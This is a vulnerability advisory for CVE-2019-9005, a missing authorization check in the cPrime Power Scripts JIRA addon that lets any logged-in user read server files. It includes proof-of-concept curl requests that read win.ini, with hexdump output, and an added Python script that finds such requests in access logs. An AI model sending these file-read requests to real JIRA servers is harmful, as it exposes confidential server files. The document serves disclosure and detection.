cve-2019-9005

Improper Authorizations / Path Traversal Vulnerability in cPrime Power Scripts for JIRA

Title

Improper Authorizations / Path Traversal Vulnerability in cPrime Power Scripts for JIRA

Product

cPrime Power Scripts

Vulnerable Version

< 4.0.14

Fixed Version

4.0.14

CVE Number

CVE-2019-9005

Impact

Critical

Homepage

https://www.cprime.com/technology/power-scripts/

Credits

Cosmin Botin (Detack GmbH)
Felix Wallaschek (Detack GmbH)

The JIRA addon Power Scripts by cPrime was affected by improper authorizations, allowing any JIRA user to probe for and read arbitrary files from the underlying server file system. The vendor provides patched versions of the addon.

 

Product Description

Power Scripts (formerly JJupin) provides versatile scripting capabilities and virtually unlimited power to enhance and automate your most complex JIRA workflows. With Power Scripts, you can effortlessly harness the full power of JIRA without any technical JIRA knowledge. Manipulate JIRA UI, access unlimited databases or any back-office system, specify custom workflow post functions and validators, and so much more!

Source: https://www.cprime.com/technology/power-scripts/

Vulnerability Description

The Power Scripts addon implements a REST API which offers several endpoints for different functionalities. The wfviewer/filecheck and wfviewer/filecontent endpoints, which are used by administrators to check and read local files, were found not to check the authorization of the calling user, allowing any authenticated user to probe for and read files from the JIRA server filesystem.

 

Proof of Concept

File Probing:

curl -s -u <user>:<password> "http://jira.server.intern/rest/keplerrominfo/jjupin/2.0/wfviewer/filecheck?path=c%3A%2FWindows%2Fwin.ini&_=1514764800000"  
{"id":9}

File Reading:

curl -s -u <user>:<password> "http://jira.server.intern/rest/keplerrominfo/jjupin/2.0/wfviewer/filecontent?path=c%3A%2FWindows%2Fwin.ini&_=1514764800000"  | hexdump -C
00000000  3b 20 66 6f 72 20 31 36  2d 62 69 74 20 61 70 70  |; for 16-bit app|
00000010  20 73 75 70 70 6f 72 74  0d 3c 62 72 3e 5b 66 6f  | support.<br>[fo|
00000020  6e 74 73 5d 0d 3c 62 72  3e 5b 65 78 74 65 6e 73  |nts].<br>[extens|
00000030  69 6f 6e 73 5d 0d 3c 62  72 3e 5b 6d 63 69 20 65  |ions].<br>[mci e|
00000040  78 74 65 6e 73 69 6f 6e  73 5d 0d 3c 62 72 3e 5b  |xtensions].<br>[|
00000050  66 69 6c 65 73 5d 0d 3c  62 72 3e 5b 4d 61 69 6c  |files].<br>[Mail|
00000060  5d 0d 3c 62 72 3e 4d 41  50 49 3d 31 0d 3c 62 72  |].<br>MAPI=1.<br|
00000070  3e                                                |>|
00000071

 

Solution / Workaround

It is recommended to update the Power Scripts addon to the latest available version.
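
Alongside updating, access logs can be reviewed for earlier requests to the two wfviewer endpoints by users who are not administrators. The following is an added example, not part of the original advisory or the vendor's code. It assumes an access log in Common Log Format with the authenticated user in the third field; the user names, IP addresses and log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two administrator endpoints named in the advisory.
SENSITIVE = re.compile(
    r"/rest/keplerrominfo/jjupin/[^/]+/wfviewer/(filecheck|filecontent)$")

# Assumption: Common Log Format, authenticated user in the third field.
# Adjust this pattern to the layout of the local access log.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

def find_wfviewer_access(lines, admins=frozenset()):
    """Return one finding per wfviewer file request made by a user not in `admins`."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line, skip
        url = urlsplit(m["target"])
        hit = SENSITIVE.search(url.path)
        if not hit or m["user"] in admins:
            continue
        # parse_qs percent-decodes the value: c%3A%2FWindows -> c:/Windows
        path = parse_qs(url.query).get("path", [""])[0]
        findings.append({
            "user": m["user"], "ip": m["ip"], "time": m["ts"],
            "endpoint": hit.group(1), "path": path,
            "status": int(m["status"]),
        })
    return findings

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - alice [01/Jan/2018:00:00:00 +0000] "GET /rest/keplerrominfo/jjupin/2.0/wfviewer/filecheck?path=c%3A%2FWindows%2Fwin.ini&_=1514764800000 HTTP/1.1" 200 8',
    '10.0.0.5 - alice [01/Jan/2018:00:00:02 +0000] "GET /rest/keplerrominfo/jjupin/2.0/wfviewer/filecontent?path=c%3A%2FWindows%2Fwin.ini&_=1514764800000 HTTP/1.1" 200 113',
    '10.0.0.9 - jadmin [01/Jan/2018:00:01:00 +0000] "GET /rest/keplerrominfo/jjupin/2.0/wfviewer/filecheck?path=example.txt HTTP/1.1" 200 8',
    '10.0.0.7 - bob [01/Jan/2018:00:02:00 +0000] "GET /rest/api/2/issue/TEST-1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    # "jadmin" is a hypothetical administrator account name.
    for f in find_wfviewer_access(SAMPLE_LOG, admins={"jadmin"}):
        print(f["time"], f["user"], f["ip"], f["endpoint"], f["path"], f["status"])
```

Each finding carries the decoded `path` value, so the files a non-administrator checked or read can be listed directly from the log.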